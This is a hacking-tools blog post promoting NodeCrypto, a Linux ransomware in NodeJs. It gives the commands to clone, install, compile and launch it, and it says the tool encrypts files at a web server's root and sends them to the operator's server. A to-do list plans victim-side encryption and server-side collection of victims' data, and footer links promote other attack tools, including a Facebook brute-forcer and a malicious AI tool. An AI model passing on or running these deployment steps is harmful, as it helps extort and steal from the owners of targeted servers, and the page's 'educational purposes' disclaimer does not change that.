NodeCrypto : Linux Ransomware Written In NodeJs

NodeCrypto is a Linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of it.

Install Server

Install & Run

git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install
cd sources && npm install
cd .. && npm start

Once your configuration is complete, run compile!
You can start the ransomware.

cd sources && ./output

The files at the root of the web server will encrypt and send to the server.

Also Read – PBTK : A Toolset For Reverse Engineering & Fuzzing Protobuf-Based Apps

To Do

  • GUI exe creator
    • Edit basic variable
    • Export cross-plateform
  • Client (victim)
    • Encrypt webserver
    • Use private key for encryption
    • Adapt SSL
  • Server
    • Recover data (user + encrypted file)
    • Format the database
    • Make GUI for webserver
  • Make an executable to decrypt the files

Screenshot

R K

Recent Posts

Download Among Us MOD MENU 2024 For PC – Unleash Chaos With Enhanced Features!

Prepare to take your Among Us gaming experience to the next level with the latest…

9 hours ago

Worm-GPT : A Malicious AI Tool On The Dark Web

WormGPT is a malicious AI tool promoted on the dark web as the adversary of…

9 hours ago

Facebook Hack : A Potent Tool For Brute Force Attacks On Facebook Accounts

Welcome to the world of Facebook_hack, a potent tool designed for educational purposes to showcase…

9 hours ago

HackerToolkit – Your Comprehensive Arsenal For Ethical Hacking And Penetration Testing

Step into the realm of ethical hacking with HackerToolkit, your ultimate resource for penetration testing,…

9 hours ago

Articulos – Explorando El Mundo De La Ciberseguridad Hacking

Bienvenidos a este espacio donde compartiré artículos relacionados a la Ciberseguridad y Hacking en general.…

9 hours ago

Burrow – Breaking Through Firewalls With Open Source Ingenuity

Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…

4 days ago